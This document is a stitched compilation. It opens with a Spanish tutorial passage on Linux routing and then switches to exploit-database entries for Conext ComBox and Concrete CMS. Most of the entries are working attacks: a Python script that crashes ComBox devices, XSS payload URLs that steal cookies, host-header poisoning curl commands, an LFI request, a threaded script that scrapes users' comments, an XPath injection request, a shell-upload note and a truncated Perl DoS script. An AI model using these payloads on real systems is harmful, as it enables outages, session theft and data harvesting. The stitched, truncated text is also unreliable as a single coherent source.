- IP: 192.168.10.20 y 192.168.20.10 –> 2 Interfaces de Red
- Debian 2 –> Servidor Apache 2 activado
- IP: 192.168.20.20
- Kali –> Mi equipo de atacante
Para comprobarlo, tendremos que mirar el contenido del archivo /proc/sys/net/ipv4/ip_forward.
Si está desactivado, el contenido será 0, por lo que, si queremos activarlo, tendremos que modificar su contenido a 1:
echo '1' > /proc/sys/net/ipv4/ip_forward
Teniendo este valor activado en el Debian 1, ya solo queda agregar el enrutamiento estático.
¡OJO!, importante, tendremos que agregar la ruta estática por supuesto a nuestro kali, pero no olvidemos que también tendremos que agregarla a la máquina con la que queramos interactuar de la otra red (Debian 2), para que las respuestas sepan llegar a nosotros.
Podemos ver las rutas estáticas con el siguiente comando:
Podemos agregar y eliminar rutas estáticas a nuestro antojo con los siguientes comandos (hace falta root):
- Agregar:
ip route add <ip de red a llegar>/<mascara de red en CIDR> via <ip del router> dev <interfaz a usar>
- Eliminar:
ip route delete <ip de red a llegar>/<mascara de red en CIDR> via <ip del router> dev <interfaz a usar>
De esta forma, en este caso, las rutas a agregar tanto en el Kali como en el Debian 2, serían las siguientes:
- Kali:
- Debian 2:
Teniendo el IP Forwarding ya activado en el Debian 1 y las rutas estáticas tanto en el Kali como en el Debian 2, ya podemos comunicarnos entre estos dos dispositivos sin ningún tipo de problema:
Y con esto ya habríamos configurado un Linux como router, además de hacer uso de ip route para agregar rutas que no tenemos de forma por defecto.
#Exploit Title: Conext ComBox - Denial of Service (HTTP-POST)
#Description: The exploit cause the device to self-reboot, constituting a denial of service.
#Google Dork: "Conext ComBox" + "JavaScript was not detected" /OR/ "Conext ComBox" + "Recover Lost Password"
#Date: March 02, 2017
#Exploit Author: Mark Liapustin & Arik Kublanov
#Vendor Homepage: http://solar.schneider-electric.com/product/conext-combox/
#Software Link: http://cdn.solar.schneider-electric.com/wp-content/uploads/2016/06/conext-combox-data-sheet-20160624.pdf
#Version: All firmware versions prior to V3.03 BN 830
#Tested on: Windows and Linux
#CVE: CVE-2017-6019
# Use this script with caution!
# Mark Liapustin: https://www.linkedin.com/in/clizsec/
# Arik Kublanov: https://www.linkedin.com/in/arik-kublanov-57618a64/
# =========================================================
import subprocess
import os
import sys
import time
import socket
# =========================================================
print 'Usage: python ComBoxDos.py IP PORT'
print 'Number of arguments:', len(sys.argv), 'arguments.'
print 'Argument List:', str(sys.argv)
print "ComBox Denial of Service via HTTP-POST Request"
global cmdosip
cmdosip = str(sys.argv[1])
port = int(sys.argv[2])
print "[!] The script will cause the Conext ComBox device to crash and to reboot itself."
print "Executing...\n\n\n"
for i in range(1, 1000):
try:
cmdosdir = "login.cgi?login_username=Nation-E&login_password=DOS&submit=Log+In"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((cmdosip, port))
print "[+] Sent HTTP POST Request to: " + cmdosip + " with /" + cmdosdir + " HTTP/1.1"
s.send("POST /" + cmdosdir + " HTTP/1.1\r\n")
s.send("Host: " + cmdosip + "\r\n\r\n")
s.close()
except:
pass
source: https://www.securityfocus.com/bid/53640/info
Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
1. Multiple cross-site scripting vulnerabilities
2. An arbitrary-file-upload vulnerability
3. A denial-of-service vulnerability
An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Concrete CMS versions 5.5 and 5.5.21 are vulnerable.
http://www.example.com/concrete/flash/thumbnail_editor_2.swf
http://www.example.com/concrete/flash/thumbnail_editor_3.swf
http://www.example.com/concrete/flash/swfupload/swfupload.swf
http://www.example.com/concrete/flash/uploader/uploader.swf
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CONCRETE5-v8.1.0-HOST-HEADER-INJECTION.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.concrete5.org
Product:
================
concrete5 v8.1.0
concrete5 is an open-source content management system (CMS) for publishing content on the World Wide Web and intranets.
Vulnerability Type:
======================
Host Header Injection
CVE Reference:
==============
CVE-2017-7725
Security Issue:
================
If a user does not specify a "canonical" URL on installation of concrete5, unauthenticated remote attackers can write to the
"collectionversionblocksoutputcache" table of the MySQL Database, by making HTTP GET request with a poisoned HOST header.
Some affected concrete5 webpages can then potentially render arbitrary links that can point to a malicious website.
Example MySQL data from "CollectionVersionBlocksOutputCache" table.
(164, 1, 57, 'Header Site Title', '<a href="http://attacker-ip/concrete5-8.1.0/index.php" id="header-site-title">Elemental</a>', 1649861489
e.g.
c:\> curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/services -H "Host: attacker-ip" | more
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<link rel="stylesheet" type="text/css" href="/concrete5-8.1.0/concrete/themes/elemental/css/bootstrap-modified.css">
<link href="/concrete5-8.1.0/application/files/cache/css/elemental/main.css?ts=1492101910" rel="stylesheet" type="text/css" media="all">
<title>Services :: POC</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
<meta name="generator" content="concrete5 - 8.1.0"/>
<script type="text/javascript">
var CCM_DISPATCHER_FILENAME = "/concrete5-8.1.0/index.php";
var CCM_CID = 162;
var CCM_EDIT_MODE = false;
var CCM_ARRANGE_MODE = false;
var CCM_IMAGE_PATH = "/concrete5-8.1.0/concrete/images";
var CCM_TOOLS_PATH = "/concrete5-8.1.0/index.php/tools/required";
var CCM_APPLICATION_URL = "http://attacker-ip/concrete5-8.1.0"; <=================== HERE
var CCM_REL = "/concrete5-8.1.0";
</script>
Exploit:
=========
curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/team/faq -H "Host: attacker-ip"
curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/services -H "Host: attacker-ip"
curl -v http://VICTIM-IP/concrete5-8.1.0/index.php/portfolio -H "Host: attacker-ip"
Navigate to one of these URLs:
http://VICTIM-IP/concrete5-8.1.0/index.php/services
http://VICTIM-IP/concrete5-8.1.0/index.php/portfolio
Click on links in header portion of the webpage from one of the above URLs.
Services
Portfolio
Team / Drop down Menu
Blog
Contact
OR
click on the links on footer portion of the webpage.
FAQ / Help
Case Studies
Blog
Another Link
View on Google Maps
Result: user gets redirected to attacker-ip.
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
======================================================
Vendor Notification : April 11, 2017
Vendor reply: "this is a known issue" : April 12, 2017
Requested a CVE from mitre.
CVE assigned : April 12, 2017
April 13, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
-------------------------------------------------------------------------------
Concrete5 <= 5.7.3.1 (Application::dispatch) Local File Inclusion Vulnerability
-------------------------------------------------------------------------------
[-] Software Link:
https://www.concrete5.org/
[-] Affected Versions:
Version 5.7.3.1 and probably other versions.
[-] Vulnerability Description:
The vulnerable code is located within the "Application::dispatch()" method:
326. public function dispatch(Request $request)
327. {
328. if ($this->installed) {
329. $response = $this->getEarlyDispatchResponse();
330. }
331. if (!isset($response)) {
332. $collection = Route::getList();
333. $context = new \Symfony\Component\Routing\RequestContext();
334. $context->fromRequest($request);
335. $matcher = new UrlMatcher($collection, $context);
336. $path = rtrim($request->getPathInfo(), '/') . '/';
337. try {
338. $request->attributes->add($matcher->match($path));
339. $matched = $matcher->match($path);
340. $route = $collection->get($matched['_route']);
341. Route::setRequest($request);
342. $response = Route::execute($route, $matched);
The vulnerability exists because the path for the incoming request is retrieved using the
"Request::getPathInfo()" method from the Symfony framework, which allows to specify the path
for the request within some HTTP headers (like "X-Original-URL" and some others). So, it might
be possible to specify paths containing "dot-dot-slash" sequences without worrying about URL
encoding and path normalization done by the web server. This could be exploited by unauthenticated
attackers to include arbitrary .php files located outside the Concrete5 root directory or from the
Concrete5 codebase itself (potentially leading to unauthorized access to certain functionalities)
by sending an HTTP request like this:
GET /concrete5/index.php HTTP/1.1
Host: localhost
X-Original-Url: /tools/../../index
Connection: keep-alive
The dispatching process for this request will try to re-include the index.php file,
and this will end up with an unexpected error.
[-] Solution:
Update to a fixed version.
[-] Disclosure Timeline:
[05/05/2015] - Vulnerability details sent through HackerOne
[02/10/2015] - CVE number requested
[19/12/2015] - Vulnerability fixed on the GitHub repository
[26/06/2016] - Vulnerability publicly disclosed on HackerOne
[28/06/2016] - Publication of this advisory
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2016-10
[-] Other References:
https://hackerone.com/reports/59665
source: https://www.securityfocus.com/bid/53268/info
concrete5 is prone to information-disclosure, SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to harvest sensitive information, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
concrete5 5.5.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/concrete5.5.2.1/index.php/tools/required/edit_collection_popup.php?approveImmediately=%22%3e%3cimg%20src%3dx%20onerror%3dalert(123123123)%3e&cID=102&ctask=edit_metadata
http://www.example.com/concrete5.5.2.1/index.php?cID=121&bID=38&arHandle=Main&ccm_token=...:...&btask=''%3b!--"%3cbody%20onload%3dalert(12312312323)%3e%3d%26{()}&method=submit_form
#!/usr/bin/env python3
# Concrete5 < 8.3 vulnerable to Authorization Bypass Through User-Controlled Key (IDOR)
# CVE-2017-18195
# Chapman (R3naissance) Schleiss
from queue import Queue
from threading import Thread
from bs4 import BeautifulSoup
from tabulate import tabulate
import argparse
import requests
import logging
parser = argparse.ArgumentParser(
description="This script attempts to enumerate all comments from a vulnerable Concrete5 CMS.",
)
parser.add_argument('-u','--url', action='store', dest='url', required=True,
help="This is the url to attack. Typically http://example.com/index.php/tools/required/conversations/view_ajax")
parser.add_argument('-s','--start', action='store', type=int, dest='start_id',
help='Where to start enumeration')
parser.add_argument('-e','--end', action='store', type=int, dest='end_id',
help='Where to end enumeration')
parser.add_argument('-v','--verbose', action='store_true', dest='verbose',
help='This boolean flag will trigger all raw information to stdout')
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG, format='[%(levelname)s] - %(threadName)s - %(message)s')
else:
logging.basicConfig(level=logging.INFO, format='[%(levelname)s] %(message)s')
if args.start_id is None:
args.start_id = 1
if args.end_id is None:
args.end_id = 10
def crawl(q, result):
while not q.empty():
work = q.get()
logging.debug("Requesting cnvID: " + str(work))
try:
response = requests.post(args.url, data={'cnvID': work, 'cID': 1}, timeout=300)
logging.debug("Requested cnvID: %s [%s]", str(work), str(response.status_code))
if response.status_code < 400 or response.status_code > 499:
logging.debug("Parsing html and adding comments to results list")
soup = BeautifulSoup(response.text, 'html.parser')
username = soup.find_all('span', {'class': 'ccm-conversation-message-username'})
message = soup.find_all('div', {'class': 'ccm-conversation-message-body'})
for i in range(len(username)):
results.append((work, username[i].text.strip(), message[i].text.strip()))
logging.info("Completed cnvID: " + str(work))
except:
logging.error('Error getting cnvID: ' + str(work))
q.task_done()
return True
q = Queue(maxsize=0)
enum = range(args.start_id, args.end_id + 1)
num_theads = min(50, len(enum))
results = []
for i in enum:
q.put(i)
for i in range(num_theads):
logging.debug('Starting thread ' + str(i))
worker = Thread(target=crawl, args=(q, results), name="Thread: " + str(i))
worker.setDaemon(True)
worker.start()
logging.debug('Waiting for final threads to complete')
q.join()
logging.info('Enumeration complete')
print(tabulate(results, headers=('cnvID', 'username', 'message'), tablefmt='grid'))
## Exploit Title: Concrete5 CME v9.1.3 - Xpath injection
## Author: nu11secur1ty
## Date: 11.28.2022
## Vendor: https://www.concretecms.org/
## Software: https://www.concretecms.org/download
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3
## Description:
The URL path folder `3` appears to be vulnerable to XPath injection attacks.
The test payload 50539478' or 4591=4591-- was submitted in the URL
path folder `3`, and an XPath error message was returned.
The attacker can flood with requests the system by using this
vulnerability to untilted he receives the actual paths of the all
content of this system which content is stored on some internal or
external server.
## STATUS: HIGH Vulnerability
[+] Exploits:
00:
```GET
GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```
[+] Response:
```HTTP
HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Nov 2022 15:32:22 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 592153
<!DOCTYPE html><!--
Whoops\Exception\ErrorException: include(): Failed opening
'C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php'
for inclusion (include_path='C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR')
in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php
on line 26
Stack trace:
1. Whoops\Exception\ErrorException->()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
3. Stash\Driver\FileSystem\NativeEncoder->deserialize()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201
4. Stash\Driver\FileSystem->getData()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631
5. Stash\Item->getRecord()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321
6. Stash\Item->executeGet()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252
7. Stash\Item->get()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346
8. Stash\Item->isMiss()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67
9. Concrete\Core\Cache\Adapter\LaminasCacheDriver->internalGetItem()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356
10. Laminas\Cache\Storage\Adapter\AbstractAdapter->getItem()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601
11. Laminas\I18n\Translator\Translator->loadMessages()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434
12. Laminas\I18n\Translator\Translator->getTranslatedMessage()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349
13. Laminas\I18n\Translator\Translator->translate()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69
14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter->translate()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27
15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47
16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267
17. Concrete\Core\Block\View\BlockView->renderViewContents()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
18. Concrete\Core\View\AbstractView->render()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853
19. Concrete\Core\Area\Area->display()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128
20. Concrete\Core\Area\GlobalArea->display()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11
21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125
22. Concrete\Core\View\View->inc()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4
23. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329
24. Concrete\Core\View\View->renderTemplate()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291
25. Concrete\Core\View\View->renderViewContents()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
26. Concrete\Core\View\AbstractView->render()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19
27. Concrete\Controller\SinglePage\PageNotFound->view()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
28. call_user_func_array()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
29. Concrete\Core\Controller\AbstractController->runAction()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188
30. Concrete\Core\Http\ResponseFactory->controller()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95
31. Concrete\Core\Http\ResponseFactory->notFound()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390
32. Concrete\Core\Http\ResponseFactory->collectionNotFound()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234
33. Concrete\Core\Http\ResponseFactory->collection()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132
34. Concrete\Core\Http\DefaultDispatcher->handleDispatch()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60
35. Concrete\Core\Http\DefaultDispatcher->dispatch()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39
36. Concrete\Core\Http\Middleware\DispatcherDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39
37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
38. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36
39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
40. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36
41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
42. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35
43. Concrete\Core\Http\Middleware\CookieMiddleware->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
44. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29
45. Concrete\Core\Http\Middleware\ApplicationMiddleware->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
46. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86
47. Concrete\Core\Http\Middleware\MiddlewareStack->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85
48. Concrete\Core\Http\DefaultServer->handleRequest()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125
49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner->run()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102
50. Concrete\Core\Foundation\Runtime\DefaultRuntime->run()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45
51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2
--><html>
<head>
<meta charset="utf-8">
<meta name="robots" content="noindex,nofollow"/>
<meta name="viewport" content="width=device-width,
initial-scale=1, shrink-to-fit=no"/>
<title>Concrete CMS has encountered an issue.</title>
<style>body {
font: 12px "Helvetica Neue", helvetica, arial, sans-serif;
color: #131313;
background: #eeeeee;
padding:0;
margin: 0;
max-height: 100%;
text-rendering: optimizeLegibility;
}
a {
text-decoration: none;
}
.Whoops.container {
position: relative;
z-index: 9999999999;
}
.panel {
overflow-y: scroll;
height: 100%;
position: fixed;
margin: 0;
left: 0;
top: 0;
}
.branding {
position: absolute;
top: 10px;
right: 20px;
color: #777777;
font-size: 10px;
z-index: 100;
}
.branding a {
color: #e95353;
}
header {
color: white;
box-sizing: border-box;
background-color: #2a2a2a;
padding: 35px 40px;
max-height: 180px;
overflow: hidden;
transition: 0.5s;
}
header.header-expand {
max-height: 1000px;
}
.exc-title {
margin: 0;
color: #bebebe;
font-size: 14px;
}
.exc-title-primary, .exc-title-secondary {
color: #e95353;
}
.exc-message {
font-size: 20px;
word-wrap: break-word;
margin: 4px 0 0 0;
color: white;
}
.exc-message span {
display: block;
}
.exc-message-empty-notice {
color: #a29d9d;
font-weight: 300;
}
.......
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)
## Proof and Exploit:
[href](https://streamable.com/4f60ka)
## Time spent
`03:00:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Concrete5 8.5.4 - 'name' Stored XSS
# Date: 2021-01
# Exploit Author: Quadron Research Lab
# Version: Concrete5 8.5.4
# Tested on: Windows 10 x64 HUN/ENG Professional
# Vendor: Concrete5 CMS (https://www.concrete5.org)
# CVE: CVE-2021-3111
[Suggested description]
The Express Entries Dashboard inConcrete5 8.5.4 allows stored XSS via the name field of a new data object at anindex.php/dashboard/express/entries/view/ URI.
[Attack Vectors]
Creating a new data object, the name field is not filtered. It is possible to place JavaScript code. [Stored XSS]
Proof of Concept
https://github.com/Quadron-Research-Lab/CVE/blob/main/CVE-2021-3111.pdf
source: https://www.securityfocus.com/bid/53640/info
Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
1. Multiple cross-site scripting vulnerabilities
2. An arbitrary-file-upload vulnerability
3. A denial-of-service vulnerability
An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Concrete CMS versions 5.5 and 5.5.21 are vulnerable.
Cross Site Scripting:
1) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode="><script>alert(1);</script>
2) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID="><script>alert(document.cookie);</script>&searchInstance=file1337335625
3) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID=13&searchInstance="><script>alert(document.cookie);</script>
3A)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance=&searchInstance=&ccm_order_by=fvDateAdded&ccm_order_dir=asc&searchType=123 &searchInstance="><script>alert(1);</script>
www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance="><script>alert(1);</script>
4)(onmouseovervent) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=" onmouseover="alert(1)"&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]=
4A)(without onmouseover event)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance="><script>alert(1);</script>&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]=
5)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode=move_copy_delete&cID="><script>alert(1);</script>
6) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/edit?searchInstance=');</script><script>alert(document.cookie);</script>&fID=7
&fid=VALID_ID_OF_IAMGE
7)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/add_to?searchInstance="><script>alert(document.cookie);</script>&fID=owned
8)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/replace?searchInstance="><script>alert(document.cookie);</script>&fID=4
9)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/bulk_properties/?&fID[]=17&uploaded=true&searchInstance="><script>alert(document.cookie);</script>
&fid=VALID_ID_OF_IAMGE
10)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/permissions?searchInstance="><script>alert("AkaStep");</script>&fID=owned
11)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id="><script>alert(1);</script>&node=owned&display_mode=full&select_mode=&selectedPageID=
11A)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node="><script>alert(1);</script>&display_mode=full&select_mode=&selectedPageID=
11B)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode="><script>alert(1);</script>&select_mode=&selectedPageID=
11C)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode=owned&selectedPageID="><script>alert(1);</script>
11D)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode="><script>alert(1);</script>&selectedPageID=owned
(All parameters goes to page source without any sanitization +validation)
12)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_dialog?ocID="><script>alert(1);</script>&search=1
13)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/customize_search_columns?searchInstance="><script>alert(document.cookie);</script>
Shell upload:
#### p0c 1 [ Upload File via FlashUploader ] ###==>
http://www.example.com/concrete/flash/thumbnail_editor_2.swf
http://www.example.com/concrete/flash/thumbnail_editor_3.swf
http://www.example.com/concrete/flash/swfupload/swfupload.swf
http://www.example.com/concrete/flash/uploader/uploader.swf
# Upload File/Shell Inj3ct0r.php;.gif
DOS:
#### p0c 2 [ DDos with RPC 'using simple PERL script]===>
#!/usr/bin/perl
use Socket;
